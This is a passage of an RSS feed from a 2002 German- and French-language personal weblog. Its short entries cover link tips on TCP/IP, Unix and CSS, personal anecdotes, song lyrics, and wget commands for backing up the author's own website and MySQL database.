  13951.    <title>200. Eintrag!</title>
  13952.    <link>https://blog.x-way.org/Misc/2002/11/25/200_Eintrag.html</link>
  13953.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=200</guid>
  13954.    <dc:creator>Andreas Jaggi</dc:creator>
  13955.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  13956.    <pubDate>Mon, 25 Nov 2002 21:18:00 +0000</pubDate>
  13957.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  13958.    <description><![CDATA[Es lässt sich also doch so einiges an Schwachsinn zusammentragen ;-)
  13959. ]]></description>
  13960.    <content:encoded><![CDATA[Es lässt sich also doch so einiges an Schwachsinn zusammentragen ;-)
  13961. ]]></content:encoded>
  13962.  </item>
  13963.  
  13964.  <item>
  13965.    <title>TCP/IP - Lehrgang</title>
  13966.    <link>https://blog.x-way.org/Networking/2002/11/25/TCPIP_-_Lehrgang.html</link>
  13967.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=199</guid>
  13968.    <dc:creator>Andreas Jaggi</dc:creator>
  13969.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  13970.    <pubDate>Mon, 25 Nov 2002 21:13:00 +0000</pubDate>
  13971.    <category domain="https://blog.x-way.org/Networking">Networking</category>
  13972.    <description><![CDATA[Noch eine Gedächtnisstütze: <a href="https://web.archive.org/web/20021128113805/http://people.ee.ethz.ch/~strub/tcp-ip/tcp-ip.html"><b>TCP/IP - Lehrgang</b></a> von <a href="https://web.archive.org/web/20021128113805/http://people.ee.ethz.ch/~strub/"><b>Dr. Rudolf Strub</b></a>
  13973. ]]></description>
  13974.    <content:encoded><![CDATA[Noch eine Gedächtnisstütze: <a href="https://web.archive.org/web/20021128113805/http://people.ee.ethz.ch/~strub/tcp-ip/tcp-ip.html"><b>TCP/IP - Lehrgang</b></a> von <a href="https://web.archive.org/web/20021128113805/http://people.ee.ethz.ch/~strub/"><b>Dr. Rudolf Strub</b></a>
  13975. ]]></content:encoded>
  13976.  </item>
  13977.  
  13978.  <item>
  13979.    <title>Einführung in Unix und die csh</title>
  13980.    <link>https://blog.x-way.org/Linux/2002/11/25/Einfuehrung_in_Unix_und_die_csh.html</link>
  13981.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=198</guid>
  13982.    <dc:creator>Andreas Jaggi</dc:creator>
  13983.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  13984.    <pubDate>Mon, 25 Nov 2002 21:12:00 +0000</pubDate>
  13985.    <category domain="https://blog.x-way.org/Linux">Linux</category>
  13986.    <description><![CDATA[Nur damit ich den Link nicht verliere: <a href="https://web.archive.org/web/20021004011033/http://people.ee.ethz.ch/~strub/unix/unix.html"><b>Einführung in Unix und die csh</b></a> von <a href="https://web.archive.org/web/20021128113805/http://people.ee.ethz.ch/~strub/"><b>Dr. Rudolf Strub</b></a><br>Dort hat's übrigens noch mehr Anleitungen: <a href="https://web.archive.org/web/20021128113805/http://people.ee.ethz.ch/~strub/tkperl/tkperl-einf.html"><b>perl/Tk</b></a> und <a href="https://web.archive.org/web/20021004013233/http://people.ee.ethz.ch/~strub/vnc/index.html"><b>VNC</b></a>.
  13987. ]]></description>
  13988.    <content:encoded><![CDATA[Nur damit ich den Link nicht verliere: <a href="https://web.archive.org/web/20021004011033/http://people.ee.ethz.ch/~strub/unix/unix.html"><b>Einführung in Unix und die csh</b></a> von <a href="https://web.archive.org/web/20021128113805/http://people.ee.ethz.ch/~strub/"><b>Dr. Rudolf Strub</b></a><br>Dort hat's übrigens noch mehr Anleitungen: <a href="https://web.archive.org/web/20021128113805/http://people.ee.ethz.ch/~strub/tkperl/tkperl-einf.html"><b>perl/Tk</b></a> und <a href="https://web.archive.org/web/20021004013233/http://people.ee.ethz.ch/~strub/vnc/index.html"><b>VNC</b></a>.
  13989. ]]></content:encoded>
  13990.  </item>
  13991.  
  13992.  <item>
  13993.    <title>centricle</title>
  13994.    <link>https://blog.x-way.org/Webdesign/2002/11/25/centricle.html</link>
  13995.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=197</guid>
  13996.    <dc:creator>Andreas Jaggi</dc:creator>
  13997.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  13998.    <pubDate>Mon, 25 Nov 2002 21:07:00 +0000</pubDate>
  13999.    <category domain="https://blog.x-way.org/Webdesign">Webdesign</category>
  14000.    <description><![CDATA[Auf <a href="https://web.archive.org/web/20021124015558/http://centricle.com/"><b>centricle.com</b></a> findet man viele Informationen über CSS. Look at it!
  14001. ]]></description>
  14002.    <content:encoded><![CDATA[Auf <a href="https://web.archive.org/web/20021124015558/http://centricle.com/"><b>centricle.com</b></a> findet man viele Informationen über CSS. Look at it!
  14003. ]]></content:encoded>
  14004.  </item>
  14005.  
  14006.  <item>
  14007.    <title>Valid RSS</title>
  14008.    <link>https://blog.x-way.org/Coding/2002/11/25/Valid_RSS.html</link>
  14009.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=196</guid>
  14010.    <dc:creator>Andreas Jaggi</dc:creator>
  14011.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  14012.    <pubDate>Mon, 25 Nov 2002 21:02:00 +0000</pubDate>
  14013.    <category domain="https://blog.x-way.org/Coding">Coding</category>
  14014.    <description><![CDATA[<a href="https://validator.w3.org/feed/check.cgi?url=https%3A%2F%2Fblog.x-way.org%2Frss.xml"><img alt="Valid RSS" src="https://blog.x-way.org/images/valid-rss.png"></a><br><br>Mon RSS-Feed est <a href="https://validator.w3.org/feed/check.cgi?url=https%3A%2F%2Fblog.x-way.org%2Frss.xml"><b>valid</b></a>!
  14015. ]]></description>
  14016.    <content:encoded><![CDATA[<a href="https://validator.w3.org/feed/check.cgi?url=https%3A%2F%2Fblog.x-way.org%2Frss.xml"><img alt="Valid RSS" src="https://blog.x-way.org/images/valid-rss.png"></a><br><br>Mon RSS-Feed est <a href="https://validator.w3.org/feed/check.cgi?url=https%3A%2F%2Fblog.x-way.org%2Frss.xml"><b>valid</b></a>!
  14017. ]]></content:encoded>
  14018.  </item>
  14019.  
  14020.  <item>
  14021.    <title>Evil phpMyAdmin Hack</title>
  14022.    <link>https://blog.x-way.org/Coding/2002/11/25/Evil_phpMyAdmin_Hack.html</link>
  14023.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=195</guid>
  14024.    <dc:creator>Andreas Jaggi</dc:creator>
  14025.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  14026.    <pubDate>Mon, 25 Nov 2002 19:38:00 +0000</pubDate>
  14027.    <category domain="https://blog.x-way.org/Coding">Coding</category>
  14028.    <description><![CDATA[Mit <a href="http://www.gnu.org/software/wget/wget.html"><b>wget</b></a> kann man natürlich auch <a href="http://mysql.com/"><b>MySQL</b></a>-DBs sichern. Wenn man nur eingeschränkten Zugriff zum Server hat, muss man die mysqldump-Funktion von <a href="http://phpmyadmin.net/"><b>phpMyAdmin</b></a> etwas missbrauchen ;-)<br><br>wget.exe -O F:Backup/mysqldump.sql --http-user=mysqluser --http-passwd=mysqlpassword "http://domain.com/phpmyadmin/tbl_dump.php?db=datenbankname&amp;what=data&amp;showcolumns=yes&amp;asfile=sendit"
  14029. ]]></description>
  14030.    <content:encoded><![CDATA[Mit <a href="http://www.gnu.org/software/wget/wget.html"><b>wget</b></a> kann man natürlich auch <a href="http://mysql.com/"><b>MySQL</b></a>-DBs sichern. Wenn man nur eingeschränkten Zugriff zum Server hat, muss man die mysqldump-Funktion von <a href="http://phpmyadmin.net/"><b>phpMyAdmin</b></a> etwas missbrauchen ;-)<br><br>wget.exe -O F:Backup/mysqldump.sql --http-user=mysqluser --http-passwd=mysqlpassword "http://domain.com/phpmyadmin/tbl_dump.php?db=datenbankname&amp;what=data&amp;showcolumns=yes&amp;asfile=sendit"
  14031. ]]></content:encoded>
  14032.  </item>
  14033.  
  14034.  <item>
  14035.    <title>wget</title>
  14036.    <link>https://blog.x-way.org/Coding/2002/11/25/wget.html</link>
  14037.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=194</guid>
  14038.    <dc:creator>Andreas Jaggi</dc:creator>
  14039.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  14040.    <pubDate>Mon, 25 Nov 2002 19:28:00 +0000</pubDate>
  14041.    <category domain="https://blog.x-way.org/Coding">Coding</category>
  14042.    <description><![CDATA[Schön, dass es <a href="http://www.gnu.org/software/wget/wget.html"><b>wget</b></a> auch für Windows gibt. Damit kann man dann so schöne Sachen machen, wie zum Beispiel das automatisierte Backup einer ganzen Website:<br><br>wget.exe -m ftp://user:password@domain.com/ -P F:Backup
  14043. ]]></description>
  14044.    <content:encoded><![CDATA[Schön, dass es <a href="http://www.gnu.org/software/wget/wget.html"><b>wget</b></a> auch für Windows gibt. Damit kann man dann so schöne Sachen machen, wie zum Beispiel das automatisierte Backup einer ganzen Website:<br><br>wget.exe -m ftp://user:password@domain.com/ -P F:Backup
  14045. ]]></content:encoded>
  14046.  </item>
  14047.  
  14048.  <item>
  14049.    <title> Logitech® MX™500 Optical Mouse</title>
  14050.    <link>https://blog.x-way.org/Tech/2002/11/25/_Logitech_MX8482500_Optical_Mouse.html</link>
  14051.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=193</guid>
  14052.    <dc:creator>Andreas Jaggi</dc:creator>
  14053.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  14054.    <pubDate>Mon, 25 Nov 2002 19:19:00 +0000</pubDate>
  14055.    <category domain="https://blog.x-way.org/Tech">Tech</category>
  14056.    <description><![CDATA[<a href="https://blog.x-way.org/images/mx500.jpg"><img src="https://blog.x-way.org/images/mx500.gif" alt="Logitech® MX™500 Optical Mouse"></a><br><br>Jetzt meins ;-)<br><br>Ein Lob auf <a href="https://web.archive.org/web/20060215102832/http://byte-line.ch/"><b>byte-line.ch</b></a>!
  14057. ]]></description>
  14058.    <content:encoded><![CDATA[<a href="https://blog.x-way.org/images/mx500.jpg"><img src="https://blog.x-way.org/images/mx500.gif" alt="Logitech® MX™500 Optical Mouse"></a><br><br>Jetzt meins ;-)<br><br>Ein Lob auf <a href="https://web.archive.org/web/20060215102832/http://byte-line.ch/"><b>byte-line.ch</b></a>!
  14059. ]]></content:encoded>
  14060.  </item>
  14061.  
  14062.  <item>
  14063.    <title>em</title>
  14064.    <link>https://blog.x-way.org/Webdesign/2002/11/24/em.html</link>
  14065.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=192</guid>
  14066.    <dc:creator>Andreas Jaggi</dc:creator>
  14067.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  14068.    <pubDate>Sun, 24 Nov 2002 23:36:00 +0000</pubDate>
  14069.    <category domain="https://blog.x-way.org/Webdesign">Webdesign</category>
  14070.    <description><![CDATA[So, Schriftgrössenangaben sind nicht mehr in pt sondern in em.<br>Mozilla, IE und Opera interpretieren's in etwa gleich. Leider ist's nun im Netscape 4.x wirklich nicht mehr ansehbar.<br>Aber keine Sorge, dass nächste Layout ist schon in Planung ;-)
  14071. ]]></description>
  14072.    <content:encoded><![CDATA[So, Schriftgrössenangaben sind nicht mehr in pt sondern in em.<br>Mozilla, IE und Opera interpretieren's in etwa gleich. Leider ist's nun im Netscape 4.x wirklich nicht mehr ansehbar.<br>Aber keine Sorge, dass nächste Layout ist schon in Planung ;-)
  14073. ]]></content:encoded>
  14074.  </item>
  14075.  
  14076.  <item>
  14077.    <title>11h11</title>
  14078.    <link>https://blog.x-way.org/Webdesign/2002/11/24/11h11.html</link>
  14079.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=191</guid>
  14080.    <dc:creator>Andreas Jaggi</dc:creator>
  14081.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  14082.    <pubDate>Sun, 24 Nov 2002 00:48:00 +0000</pubDate>
  14083.    <category domain="https://blog.x-way.org/Webdesign">Webdesign</category>
  14084.    <description><![CDATA[Sur <a href="https://web.archive.org/web/20021125231019/http://www.11h11.com/"><b>11h11.com</b></a> il y a plus de 400 oeuvres, crées en 40 projets. Et cela ne sont pas seulement des images crées avec photoshop. Il y a des peintures, des images digitales, des photographies, des illustrations, des sons et même des vidéos! C'est vraiment une source d'art multimédial :-)
  14085. ]]></description>
  14086.    <content:encoded><![CDATA[Sur <a href="https://web.archive.org/web/20021125231019/http://www.11h11.com/"><b>11h11.com</b></a> il y a plus de 400 oeuvres, crées en 40 projets. Et cela ne sont pas seulement des images crées avec photoshop. Il y a des peintures, des images digitales, des photographies, des illustrations, des sons et même des vidéos! C'est vraiment une source d'art multimédial :-)
  14087. ]]></content:encoded>
  14088.  </item>
  14089.  
  14090.  <item>
  14091.    <title>12 inches couch</title>
  14092.    <link>https://blog.x-way.org/Webdesign/2002/11/24/12_inches_couch.html</link>
  14093.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=190</guid>
  14094.    <dc:creator>Andreas Jaggi</dc:creator>
  14095.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  14096.    <pubDate>Sun, 24 Nov 2002 00:30:00 +0000</pubDate>
  14097.    <category domain="https://blog.x-way.org/Webdesign">Webdesign</category>
  14098.    <description><![CDATA[<a href="https://web.archive.org/web/20021203113508/http://www.11h11.com/obsolete/">t w e l v e <b>i n c h e s</b> c o u c h</a> est le site d'une étudiante en graphisme.<br>Le site a un design très spécial, à voir absolument!
  14099. ]]></description>
  14100.    <content:encoded><![CDATA[<a href="https://web.archive.org/web/20021203113508/http://www.11h11.com/obsolete/">t w e l v e <b>i n c h e s</b> c o u c h</a> est le site d'une étudiante en graphisme.<br>Le site a un design très spécial, à voir absolument!
  14101. ]]></content:encoded>
  14102.  </item>
  14103.  
  14104.  <item>
  14105.    <title>Star Wars Episode IV</title>
  14106.    <link>https://blog.x-way.org/Misc/2002/11/23/Star_Wars_Episode_IV.html</link>
  14107.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=189</guid>
  14108.    <dc:creator>Andreas Jaggi</dc:creator>
  14109.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  14110.    <pubDate>Sat, 23 Nov 2002 20:24:00 +0000</pubDate>
  14111.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  14112.    <description><![CDATA[Einfach mal das in die Kommandozeile eingeben: <pre>telnet blinkenlights.nl</pre><br>Gefunden bei <a href="https://web.archive.org/web/20021206183751/http://www.dynamicobjects.com/~diego/weblogs/arf/"><b>Abort, Retry, Fail?</b></a>
  14113. ]]></description>
  14114.    <content:encoded><![CDATA[Einfach mal das in die Kommandozeile eingeben: <pre>telnet blinkenlights.nl</pre><br>Gefunden bei <a href="https://web.archive.org/web/20021206183751/http://www.dynamicobjects.com/~diego/weblogs/arf/"><b>Abort, Retry, Fail?</b></a>
  14115. ]]></content:encoded>
  14116.  </item>
  14117.  
  14118.  <item>
  14119.    <title>Zeitraub</title>
  14120.    <link>https://blog.x-way.org/Misc/2002/11/23/Zeitraub.html</link>
  14121.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=188</guid>
  14122.    <dc:creator>Andreas Jaggi</dc:creator>
  14123.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  14124.    <pubDate>Sat, 23 Nov 2002 19:43:00 +0000</pubDate>
  14125.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  14126.    <description><![CDATA[Eigentlich wollte ich ja heute die Präsentation meiner Maturaarbeit vorbereiten, aber dann ist es doch anders gekommen. Hab noch ein wenig an meinem Weblog gebastelt.<br>Sichtbare Änderungen gibt's eigentlich keine, ausser dass jetzt die Schriftgrössen in pt und nicht mehr in px angegeben werden.
  14127. ]]></description>
  14128.    <content:encoded><![CDATA[Eigentlich wollte ich ja heute die Präsentation meiner Maturaarbeit vorbereiten, aber dann ist es doch anders gekommen. Hab noch ein wenig an meinem Weblog gebastelt.<br>Sichtbare Änderungen gibt's eigentlich keine, ausser dass jetzt die Schriftgrössen in pt und nicht mehr in px angegeben werden.
  14129. ]]></content:encoded>
  14130.  </item>
  14131.  
  14132.  <item>
  14133.    <title>Richtig defragmentieren</title>
  14134.    <link>https://blog.x-way.org/Tech/2002/11/23/Richtig_defragmentieren.html</link>
  14135.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=187</guid>
  14136.    <dc:creator>Andreas Jaggi</dc:creator>
  14137.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  14138.    <pubDate>Sat, 23 Nov 2002 12:14:00 +0000</pubDate>
  14139.    <category domain="https://blog.x-way.org/Tech">Tech</category>
  14140.    <description><![CDATA[Falls die Festplatte wieder so defragmentiert ist, wie <a href="http://waterwave.ch/weblog/detail.php?id=77"><b>damals bei mir</b></a>, hilft <a href="https://web.archive.org/web/20021207212959/http://fachschaft.physik.ruhr-uni-bochum.de/entdeckungen/defrag.shtml"><b>dieses Defragmentier-Tutorial</b></a> weiter ;-)<br><br>Von Ramon via ICQ
  14141. ]]></description>
  14142.    <content:encoded><![CDATA[Falls die Festplatte wieder so defragmentiert ist, wie <a href="http://waterwave.ch/weblog/detail.php?id=77"><b>damals bei mir</b></a>, hilft <a href="https://web.archive.org/web/20021207212959/http://fachschaft.physik.ruhr-uni-bochum.de/entdeckungen/defrag.shtml"><b>dieses Defragmentier-Tutorial</b></a> weiter ;-)<br><br>Von Ramon via ICQ
  14143. ]]></content:encoded>
  14144.  </item>
  14145.  
  14146.  <item>
  14147.    <title>Dös</title>
  14148.    <link>https://blog.x-way.org/Misc/2002/11/22/Does.html</link>
  14149.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=186</guid>
  14150.    <dc:creator>Andreas Jaggi</dc:creator>
  14151.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  14152.    <pubDate>Fri, 22 Nov 2002 20:39:00 +0000</pubDate>
  14153.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  14154.    <description><![CDATA[Ich weiss ehrlich nicht mehr, was mit mir los ist. Heute bin ich um 13 Uhr nach Hause gekommen und habe gleich bis 18 Uhr gepennt, einfach so. Und nachher hätte ich immernoch auf der Stelle einschlafen können. Hmm<br>Und das obwohl ich auf meinem 'Schulweg' schon 2 Stunden geschlafen habe und in der letzten Nacht wirklich nicht zuwenig Schlaf gekriegt habe. Komisch.
  14155. ]]></description>
  14156.    <content:encoded><![CDATA[Ich weiss ehrlich nicht mehr, was mit mir los ist. Heute bin ich um 13 Uhr nach Hause gekommen und habe gleich bis 18 Uhr gepennt, einfach so. Und nachher hätte ich immernoch auf der Stelle einschlafen können. Hmm<br>Und das obwohl ich auf meinem 'Schulweg' schon 2 Stunden geschlafen habe und in der letzten Nacht wirklich nicht zuwenig Schlaf gekriegt habe. Komisch.
  14157. ]]></content:encoded>
  14158.  </item>
  14159.  
  14160.  <item>
  14161.    <title>RFC-Editeur.org</title>
  14162.    <link>https://blog.x-way.org/Networking/2002/11/21/RFC-Editeurorg.html</link>
  14163.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=185</guid>
  14164.    <dc:creator>Andreas Jaggi</dc:creator>
  14165.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  14166.    <pubDate>Thu, 21 Nov 2002 21:29:00 +0000</pubDate>
  14167.    <category domain="https://blog.x-way.org/Networking">Networking</category>
  14168.    <description><![CDATA[Sur <a href="https://web.archive.org/web/20020531092009/http://rfc-editeur.org/"><b>RFC-Editeur.org</b></a> il y a des traductions françaises des RFC. Les RFC sont des documents qui font référence auprès de la Communauté Internet et qui décrivent, spécifient, aident à l'implémentation, standardisent et débattent de la majorité des normes, standards, technologies et protocoles liés à Internet et aux réseaux en général.
  14169. ]]></description>
  14170.    <content:encoded><![CDATA[Sur <a href="https://web.archive.org/web/20020531092009/http://rfc-editeur.org/"><b>RFC-Editeur.org</b></a> il y a des traductions françaises des RFC. Les RFC sont des documents qui font référence auprès de la Communauté Internet et qui décrivent, spécifient, aident à l'implémentation, standardisent et débattent de la majorité des normes, standards, technologies et protocoles liés à Internet et aux réseaux en général.
  14171. ]]></content:encoded>
  14172.  </item>
  14173.  
  14174.  <item>
  14175.    <title>Realien</title>
  14176.    <link>https://blog.x-way.org/School/2002/11/21/Realien.html</link>
  14177.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=184</guid>
  14178.    <dc:creator>Andreas Jaggi</dc:creator>
  14179.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  14180.    <pubDate>Thu, 21 Nov 2002 21:18:00 +0000</pubDate>
  14181.    <category domain="https://blog.x-way.org/School">School</category>
  14182.    <description><![CDATA[Wer wie ich die Lateinnote mit dem Schreiben von Realien rettet, findet <a href="https://web.archive.org/web/20021220101811/http://www.lateinforum.de/realien/index.html"><b>hier</b></a> einige Texte und Links zu verschiedenen anderen Texten.
  14183. ]]></description>
  14184.    <content:encoded><![CDATA[Wer wie ich die Lateinnote mit dem Schreiben von Realien rettet, findet <a href="https://web.archive.org/web/20021220101811/http://www.lateinforum.de/realien/index.html"><b>hier</b></a> einige Texte und Links zu verschiedenen anderen Texten.
  14185. ]]></content:encoded>
  14186.  </item>
  14187.  
  14188.  <item>
  14189.    <title>Johnny Colère</title>
  14190.    <link>https://blog.x-way.org/Music/2002/11/20/Johnny_Colere.html</link>
  14191.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=183</guid>
  14192.    <dc:creator>Andreas Jaggi</dc:creator>
  14193.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  14194.    <pubDate>Wed, 20 Nov 2002 15:18:00 +0000</pubDate>
  14195.    <category domain="https://blog.x-way.org/Music">Music</category>
  14196.    <description><![CDATA[Johnny m'a dit, Johnny m'a dit<br>Oublie ton père, oublie ta mère<br>Oublie ton coeur, oublie tes moeurs<br><br>Johnny m'a dit, Johnny m'a dit<br>Tupamaramos, Cangaceiros<br>C'est le camp qu'il faut choisir<br><br>Johnny m'a dit, Johnny m'a dit<br>Tout ça un soir ou le ciel zèbre d'éclairs<br>Nous déclarait "Nous allons fonder le parti unique"<br><br>Johnny m'a dit, Johnny m'a dit<br>Rejoins tes frères, rejoins tes soeurs<br>Bois le sang de ton ennemi<br><br>Johnny m'a dit, Johnny m'a dit<br>Ecarte le rouge, écarte le blanc<br>La seule couleur, c'est noir brillant<br>Johnny m'a dit, Johnny m'a dit<br>Tout ça un soir ou le ciel zèbre d'éclairs<br>Nous déclarait "Nous allons fonder le parti unique"<br><br>Et la victoire caresse l'espoir de nous appartenir<br>Et la victoire caresse l'espoir de nous appartenir<br>Car il faut tenir<br>Johnny m'a dit<br>Johnny m'a dit<br>Johnny m'a dit<br>Johnny m'a dit<br><br><a href="http://www.noirdez.com/"><b>Noir Désir</b></a> - Tostaky
  14197. ]]></description>
  14198.    <content:encoded><![CDATA[Johnny m'a dit, Johnny m'a dit<br>Oublie ton père, oublie ta mère<br>Oublie ton coeur, oublie tes moeurs<br><br>Johnny m'a dit, Johnny m'a dit<br>Tupamaramos, Cangaceiros<br>C'est le camp qu'il faut choisir<br><br>Johnny m'a dit, Johnny m'a dit<br>Tout ça un soir ou le ciel zèbre d'éclairs<br>Nous déclarait "Nous allons fonder le parti unique"<br><br>Johnny m'a dit, Johnny m'a dit<br>Rejoins tes frères, rejoins tes soeurs<br>Bois le sang de ton ennemi<br><br>Johnny m'a dit, Johnny m'a dit<br>Ecarte le rouge, écarte le blanc<br>La seule couleur, c'est noir brillant<br>Johnny m'a dit, Johnny m'a dit<br>Tout ça un soir ou le ciel zèbre d'éclairs<br>Nous déclarait "Nous allons fonder le parti unique"<br><br>Et la victoire caresse l'espoir de nous appartenir<br>Et la victoire caresse l'espoir de nous appartenir<br>Car il faut tenir<br>Johnny m'a dit<br>Johnny m'a dit<br>Johnny m'a dit<br>Johnny m'a dit<br><br><a href="http://www.noirdez.com/"><b>Noir Désir</b></a> - Tostaky
  14199. ]]></content:encoded>
  14200.  </item>
  14201.  
  14202.  <item>
  14203.    <title>Schnarch</title>
  14204.    <link>https://blog.x-way.org/Misc/2002/11/20/Schnarch.html</link>
  14205.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=182</guid>
  14206.    <dc:creator>Andreas Jaggi</dc:creator>
  14207.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  14208.    <pubDate>Wed, 20 Nov 2002 15:08:00 +0000</pubDate>
  14209.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  14210.    <description><![CDATA[Gestern um 19 Uhr nach Hause gekommen, vor den Fernseher gesetzt, etwa 15 min. später eingeschlafen, ca. um Mitternacht im Halbschlaf in mein Bett gewankt, weitergeschlafen bis 5 Uhr. Macht 10 Stunden Schlaf!<br>Und damit noch lange nicht genug ;-)<br>Um 6 Uhr in den Zug gesetzt und schon wieder einfach eingepennt. +1 Stunde Schlaf.<br>Und nocheinmal +1 Stunde Schlaf auf der Heimfahrt.<br><br>Bin ich schlafsüchtig?
  14211. ]]></description>
  14212.    <content:encoded><![CDATA[Gestern um 19 Uhr nach Hause gekommen, vor den Fernseher gesetzt, etwa 15 min. später eingeschlafen, ca. um Mitternacht im Halbschlaf in mein Bett gewankt, weitergeschlafen bis 5 Uhr. Macht 10 Stunden Schlaf!<br>Und damit noch lange nicht genug ;-)<br>Um 6 Uhr in den Zug gesetzt und schon wieder einfach eingepennt. +1 Stunde Schlaf.<br>Und nocheinmal +1 Stunde Schlaf auf der Heimfahrt.<br><br>Bin ich schlafsüchtig?
  14213. ]]></content:encoded>
  14214.  </item>
  14215.  
  14216.  <item>
  14217.    <title>GeForce FX</title>
  14218.    <link>https://blog.x-way.org/Tech/2002/11/18/GeForce_FX.html</link>
  14219.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=181</guid>
  14220.    <dc:creator>Andreas Jaggi</dc:creator>
  14221.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  14222.    <pubDate>Mon, 18 Nov 2002 22:43:00 +0000</pubDate>
  14223.    <category domain="https://blog.x-way.org/Tech">Tech</category>
  14224.    <description><![CDATA[<a href="http://www.nvidia.de/"><b>NVIDIA</b></a> <a href="http://heise.de/newsticker/data/anw-18.11.02-006/"><b>präsentiert</b></a> ihren neuen Graphikchip. Haben will!
  14225. ]]></description>
  14226.    <content:encoded><![CDATA[<a href="http://www.nvidia.de/"><b>NVIDIA</b></a> <a href="http://heise.de/newsticker/data/anw-18.11.02-006/"><b>präsentiert</b></a> ihren neuen Graphikchip. Haben will!
  14227. ]]></content:encoded>
  14228.  </item>
  14229.  
  14230.  <item>
  14231.    <title>Redesign</title>
  14232.    <link>https://blog.x-way.org/Misc/2002/11/18/Redesign.html</link>
  14233.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=180</guid>
  14234.    <dc:creator>Andreas Jaggi</dc:creator>
  14235.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  14236.    <pubDate>Mon, 18 Nov 2002 21:55:00 +0000</pubDate>
  14237.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  14238.    <description><![CDATA[<a href="https://web.archive.org/web/20021219012655/http://iquebec.ifrance.com/bloghappy"><b>s h a d o w</b></a> a un nouveau design.<br>Un peu de style 'dirty' et un peu de style 'retro'. Le résultat est un design actuel et attractif.<br><br>Je pense aussi à changer mon design. Est-ce que vous avez des désirs spéciaux?
  14239. ]]></description>
  14240.    <content:encoded><![CDATA[<a href="https://web.archive.org/web/20021219012655/http://iquebec.ifrance.com/bloghappy"><b>s h a d o w</b></a> a un nouveau design.<br>Un peu de style 'dirty' et un peu de style 'retro'. Le résultat est un design actuel et attractif.<br><br>Je pense aussi à changer mon design. Est-ce que vous avez des désirs spéciaux?
  14241. ]]></content:encoded>
  14242.  </item>
  14243.  
  14244.  <item>
  14245.    <title>Welcome Back</title>
  14246.    <link>https://blog.x-way.org/Misc/2002/11/18/Welcome_Back.html</link>
  14247.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=179</guid>
  14248.    <dc:creator>Andreas Jaggi</dc:creator>
  14249.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  14250.    <pubDate>Mon, 18 Nov 2002 16:36:00 +0000</pubDate>
  14251.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  14252.    <description><![CDATA[Das <a href="https://web.archive.org/web/20070403124927/http://flashback.gantenbein.ws/"><b>flashback</b></a> wird wieder gefüllt. Scheint, als klappt das mit dem Internetzugang nun doch. Gratulation! ;-)
  14253. ]]></description>
  14254.    <content:encoded><![CDATA[Das <a href="https://web.archive.org/web/20070403124927/http://flashback.gantenbein.ws/"><b>flashback</b></a> wird wieder gefüllt. Scheint, als klappt das mit dem Internetzugang nun doch. Gratulation! ;-)
  14255. ]]></content:encoded>
  14256.  </item>
  14257.  
  14258.  <item>
  14259.    <title>Einsteinrätsel</title>
  14260.    <link>https://blog.x-way.org/Misc/2002/11/18/Einsteinraetsel.html</link>
